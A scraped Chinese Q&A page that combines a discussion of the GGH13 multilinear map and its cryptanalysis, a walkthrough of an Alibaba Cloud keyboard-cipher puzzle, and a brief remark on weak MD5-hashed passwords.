Map,实际要求Map之前和Map之后的群代数结构都必须要相同才可以。&br&&br&&blockquote&EUROCRYPT 2013上,时为UCLA的博士生Sanjam Garg,以及IBM研究员Craig Gentry和Shai Halevi,共同提交了一篇论文“Candidate Multilinear Maps from Ideal Lattices”。该论文提出一个Graded Encoding Systems概念,并以此在Ideal Lattice上实现了第一个Multilinear Map(GGH Map,取名于三位作者姓名Garg、Gentry和Halevi的首字母),进而解决了现代密码学遗留的那个公开问题,这篇论文也因此获得当年欧密会的最佳论文奖。&br&&/blockquote&这个构造与其说是一个方案,不如说是一个密码学工具更为准确一点。由这3个人提出构造也一点都不奇怪。首先,Multilinear Map的构造和Gentry提出的Fully Homomorphic Encryption(FHE)非常类似:本质上,群加法运算就是FHE中的密文加法操作,Map运算就是FHE中的密文乘法操作。同时,这个工具的基础是Ideal Lattice,而Halevi正是Lattice的著名学者。他是格密码学加密方案:GGH方案(这里的GGH指的是Goldreish, Goldwasser和Halevi,不是相同的3个人,这一工作所对应的论文&Public-Key Cryptosystems from Lattice Reduction Problems&发表在CRYPTO 1997上)的构造者。至于Garg,他是UCLA的博士生… 也是因为这个工作,他从UCLA顺利毕业,而博士论文就是&Candidate Multilinear Maps&(&a href=&///?target=http%3A//www.cs.berkeley.edu/%7Esanjamg/Sanjam%2520Garg_files/sanjam-thesis.pdf& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&cs.berkeley.edu/~sanjam&/span&&span class=&invisible&&g/Sanjam%20Garg_files/sanjam-thesis.pdf&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&),并因此拿到了2013 ACM Doctoral Dissertation Award。所以… 嗯… 这么轰动密码学界的成果,使得一个博士生毕业了,实在是有点醉。实际上,Gentry也是因为他的FHE构造,经过8年的博士研究后,从Standord毕业,博士论文是&A Fully Homomorphic Encryption Scheme&(&a href=&///?target=https%3A//crypto.stanford.edu/craig/craig-thesis.pdf& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&crypto.stanford.edu/cra&/span&&span class=&invisible&&ig/craig-thesis.pdf&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&)。而Gentry的导师就是Dan Boneh。&br&&br&&blockquote&“GGH Map对密码学界产生了深远影响,迅速在国际密码学界引发了Multilinear Map研究的热潮。”胡予濮介绍说。因为这个里程碑式的构造,不仅为密码学界遗留下来的公开问题找到了答案,也促使了其他近似的构造,并有望在未来广泛应用于Witness Encryption、Broadcast Encryption、Attribute-Based Encryption、Functional Encryption、Aggregate Signatures等多种高级的应用场合,从而将现代密码学大大地向前推动一步!&br&&/blockquote&上述几个应用场景,除了Broadcast Encryption,以及我不熟悉的Aggregate Signatures以外,都是近10年才提出的密码学新概念。而密码学新概念从提出到实际使用,怎么也得需要15年以上的时间。要知道,RSA是1976年提的,理论上漏洞一堆,而且效率实在是不太高,现在照样用;椭圆曲线密码学近5年才逐渐被使用;至于2001年提出的Identity-Based Encryption,到今年正好15年,应该会开始使用了吧… 所以,Multilinear Map更多的是一种理论讨论,离实际使用还早得很,从应用角度说还有点远。&br&&br&&blockquote&“粗看上去,杰瑞格等人提出的GGH Map到处都是漏洞,但你就是无论如何也攻破不了它。”胡予濮回忆他初次接触GGH时说,“GGH提出者均是当今国际上顶尖的密码研究工作者,他们的方案十分完整,已经列举了各种能够想到的攻击方法,并都进行了尝试。”&br&&/blockquote&所谓到处是漏洞,根源在于GGH Map的公开参数中给出了很多能够帮助破解的信息。尤其是新闻稿中提到的zero-test,更是让人感觉全是漏洞。&br&&br&所谓zero-test,是指GGH Map中存在一个函数,可以帮助验证群中两个元素是否相等。这不是逗我么… 两个元素是否相等还需要一个特殊的函数吗?这是因为GGH Map的构造方式是在Lattice中的一个原始向量上增加一个噪声,只不过这个噪声特别小。因此,对于群中的同一个元素,实际上有指数多种表述方法。zero-test的目的是,检测两个元素的差是否足够小。如果足够小的话,意味着这两个元素都是在同一个原始向量上增加小噪声得来的,这是就认为这两个元素相等。&br&&br&这有什么帮助呢?既然我能检测两个元素是否相等,在给定一个元素后,我能否找另一个和给定元素相等的元素,然后求这个元素的原始向量呢?而这篇文章的工作指出,我们可以利用zero-test,找到一个和给定元素相等的元素,并求得这个元素的原始向量。只不过所找到这个元素的原始向量不是给定元素对应的原始向量。换句话说,找到的这个元素中所添加的噪声比较大。不过没关系,反正两个元素相等,并且找到了个原始向量。&br&&br&严格来说,描述应该是这样的:&br&&img src=&/22a670cebdd_b.png& data-rawwidth=&1194& data-rawheight=&506& class=&origin_image zh-lightbox-thumb& width=&1194& data-original=&/22a670cebdd_r.png&&&br&&br&&blockquote&找到了GGH的漏洞,原作者也承认了胡予濮提出的攻击是有效的,但密码学领域的这场智力较量却刚刚开始。原来,Shai Halevi随即在信中指出,胡予濮提供的第一版手稿中,攻击的第一步所采用的弱离散对数攻击方法,是原文已有的。“回来找资料,发现人家在一个报告中确实提过。”胡予濮介绍说,“但是在攻击的第二步中,我们提出了一种变形的编码/零测试工具,该工具是我们的原创性工作,也是攻击的核心技术。”&br&&/blockquote&弱离散攻击方法,就是上图的Weak DLP。这段话实际的意思是,Shai Halevi认为,胡教授第一步的工作并不是原创的,原文中已经有了。这句话潜在的意思是:这个工作的原创性是否不够?所以会有后面一段原创性工作的描述。&br&&br&&blockquote&2015年4月份,胡予濮及其博士生贾惠文提出组合精确覆盖问题的概念,对精确覆盖这一NP完备问题进行弱化,同时利用改进的编码/零测试工具,又将基于GGH的Witness Encryption方案攻破了。“这一方案的作者之一,密码学家Amit Sahai来信提醒说,我们只是在编码工具公开的情况下才攻破的,这一方案还可以在编码工具隐藏时进行,让我们在正式发表时进行修改。一段时间以后,我们进一步深入研究,把编码工具隐藏的那种方案,最后也给出了有效的密码分析,真正做到了无论在什么情况下,基于GGH的证据加密都不安全。”胡予濮回忆到。&br&&/blockquote&Witness Encryption是在计算机顶级会议STOC 2013上的成果,原始论文是&Witness Encryption and its Applications&,作者嘛,看看熟悉的人吧:Sanjam Garg, Craig Gentry, Amit Sahai, Brent Waters。Witness Encryption是新提出的一种密码学原语,这个原语的特点是:这是个加密算法,但这个加密算法没有Key Generation过程。&br&&br&我靠,又逗我,没有密钥生成,公钥私钥哪里来呢?实际上,Witness Encryption的公钥私钥是一个NP-hard问题。举例来说,我生成了一个曼哈顿回路问题实例,把这个问题实例作为公钥,问题解作为私钥。也就是说:&br&&blockquote&Can we encrypt a message so that it can only be opened by a recipient who knows a witness to an NP relation?&/blockquote&这样的好处是,Key Generation可以特别快。Witness Encryption的构造是基于GGH Map的。构造方法就是利用前面提到的Exact-3-Cover Problem这个NP-Complete问题构造实例。由于任意NP-Complete问题都可以互相归约,所以我们就可以在多项式时间复杂度下得到任意一个NP-Complete问题的Witness Encryption。&br&&br&至于编码工具公开/编码工具隐藏的问题,涉及到了Multilinear Map的具体构造,过于复杂了,有兴趣的知友们可以看一看前面我给出的一个PPT:&a href=&///?target=http%3A///link%3Furl%3DW_E-N41p6jqFRqT2YTP5t9gpf4HUf-z5-Gq5N8AcPYNbXSE1gG6fiwEU-bdOEtMvzOi7k8lCcTKJ5Aj6mjoea1IjvT6f_bWm3z-MaqYPl9W& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&多线性映射方案分析Cryptanalysis of the GGH’13 multilinear map_百度文库&i class=&icon-external&&&/i&&/a&。&br&&br&&blockquote&40年前,Diffie-Hellman解决的两方密钥交换问题,成为今天整个互联网信息安全传输的基础;而GGH Map要想解决的问题,是实现非交互多方密钥交换。换句话说,如果把经典密码学比作“1”,那么Diffie-Hellman解决的就是“2”的问题,但却带出了“≥3”该如何解决的难题。如果“≥3”的问题真的彻底解决了,能用到什么场景中,也许我们绞尽脑汁也想不到、想不全。&br&&/blockquote&题主看到这句话产生的疑问。简单的说,如果“≥3”的问题真的彻底解决了,密码学将引发彻底的革命:所有看似不可能实现的功能都将实现。举例来说:最开始提到的云安全存储、云安全计算将得到彻底解决;多方安全群组通信将得到彻底解决;软件盗版问题将得到彻底解决;等等等等。&br&&br&=============================&br&取得这样的研究成果,对于国内密码学界来说可以是一种必然。与其他领域的发展相比,密码学领域的特性就导致国内一定可以追上国际最顶级研究成果:所有理论算法可以公开也必须公开,所有讨论可以在全世界范围内进行。密码学的研究具有很强的传承性,比的更多的是快。所以很多新思想早已经存在,但在看到之前,别人已经往前走了很长的一步。所以,只要国内研究者可以在顶级研究团队研究一段时间,一定可以将一些前沿思想带回国内,从而打造顶级的研究团队。&br&&br&近几年的成果也表明,国内水平有了突飞猛进的发展。从开始时好几年没有一篇三大会议论文,到现在几乎每年都会出现5-6篇国内的研究成果。&br&&br&密码学,确实很有意思。
补充,感谢
的分享。在私下讨论中,推荐了下述总结,希望对相关领域感兴趣的朋友们有所帮助:。 ============================= 谢
邀。 个人观点,仅供参考。答案主线将沿新闻稿论述进行剖析,简单…
首先,题目叫做消失的三重密码,顾名思义,是要有提示的,实名反对楼上所有答主没有拿到全部线索就强答问题(逃&br&&br&&br&获得线索很简单,只要关注阿里云的官方微信,输入1 2 3 就会分别出现三行提示&br&&img src=&/c5f1fb01e88a21a87902_b.png& data-rawwidth=&531& data-rawheight=&318& class=&origin_image zh-lightbox-thumb& width=&531& data-original=&/c5f1fb01e88a21a87902_r.png&&&br&好了 三个提示我们得到了 一个一个来&br&&br&1.拼单词游戏,红色和绿色是多彩世界里的两极&br&&br&红绿两极说明单词的开头结尾分别是红绿或者绿红&br&&br&这里大胆猜测,绿的放最后,红的第一个放第一位&br&k e a r y o d d&br&k ? ? ? ? ? ? d&br&这里我们还剩下r,y,d三个辅音字符,这三个辅音字母基本不可能并在一个音节里,所以这个单词应该是个合成词(不太懂这个官方的叫法,我就是指这个单词应该包含两个部分,是由两个单词合起来的)&br&&br&k开头的不多,易想到key,剩下的arod,组合一下会出现doar&br&&br&合在一起就是keydoard&br&非常棒,因为他非常像keyboard(键盘),我看了一下原文本中没有b,想来是出题人只好出于无奈用d代替,因为是拼字游戏,我们可以理解成字可以自由的取垂直线上的镜像或者可以取自由旋转的值,那么d也可以勉强看作是b了&br&&br&第一个问题到此结束,我们得到了线索 keyboard&br&&br&2.300年前出现的加密方式,嗯,其实基本算是废话,近代的加密方式也轮不到我们这些门外汉来破解了,除非是第一个线索给了秘钥,然后第二个线索给了RSA,然后我们就可以decrypt了?(误)&br&&br&300年前的,我能想到的就是最基本的替换式加密,即对于26个英文字母,每一个字母都有唯一的一个映像,且26个字母的映像仍旧为26个不同的字母(定义不够官方 还请见谅 明白就好)&br&&br&嗯,键盘,替换式加密,大家差不多可以明白了吧&br&&br&qwer-&abcd&br&...&br&vbnm-&wxyz&br&so on.&br&&br&然后就可以得到轮子哥放出的文本了&br&&br&&blockquote&In the room there are four identical basketballs and two identical footballs. &br&Now if you want to put them in one line, how many solutions are there? &br&Tips:please change the form of the number you get.The Programmers&/blockquote&&br&这里除了插排法&br&C(2,5)+C(1,5) = 15 外,我会再想想有没有更好的更通用的解法,想好后会补上&br&&br&感谢补充 &a data-hash=&afafeafedd9ee& href=&///people/afafeafedd9ee& class=&member_mention& data-editable=&true& data-title=&@龙魂& data-hovercard=&p$b$afafeafedd9ee&&@龙魂&/a& @&a href=&/people/cheng-xiao-32-85& class=&internal&&风Boy&/a& 的补充&br&&br&直接看作是6个空位选两个给足球就好了。。。&br&C(6,2) = 15 &br&&br&3. 1+1!=2只有2进制下成立&br&1+1 = 10&br&15 = 1111&br&&br&正好是双十一&br&&br&嗯,这样这个题目的解答就应该完整了
首先,题目叫做消失的三重密码,顾名思义,是要有提示的,实名反对楼上所有答主没有拿到全部线索就强答问题(逃 获得线索很简单,只要关注阿里云的官方微信,输入1 2 3 就会分别出现三行提示 好了 三个提示我们得到了 一个一个来 1.拼单词游戏,红色和绿色…
如果网站不强制密码必须有一定强度,多数用户都会选择使用弱密码,也就是在攻击者彩虹表里的那些密码。这样的五千万条md5密码对攻击者来说大约等于四千万条明文密码。
如果网站不强制密码必须有一定强度,多数用户都会选择使用弱密码,也就是在攻击者彩虹表里的那些密码。这样的五千万条md5密码对攻击者来说大约等于四千万条明文密码。
已有帐号?
无法登录?
社交帐号登录

我要回帖

更多关于 十分感谢 英语 的文章

 

随机推荐